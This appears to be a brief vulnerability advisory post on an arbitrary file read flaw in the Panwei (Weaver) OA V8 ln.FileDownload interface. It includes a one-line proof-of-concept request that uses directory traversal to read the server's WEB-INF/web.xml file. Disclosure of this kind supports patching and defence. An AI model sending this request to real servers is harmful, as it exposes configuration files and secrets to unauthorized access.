Panwei Oa E Weaver Ln Filedownload Arbitrary File Reading Vulnerability
Panwei Oa E Weaver Ln Filedownload Arbitrary File Reading Vulnerability
Panwei OA E-Weaver ln.FileDownload Arbitrary file reading vulnerability
Vulnerability Description
The Panwei OA ln.FileDownload interface has a vulnerability to read any file on the server. The attacker can obtain any file on the server through the vulnerability.
Vulnerability Impact
Panwei OA V8
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
This post is licensed under CC BY 4.0 by the author.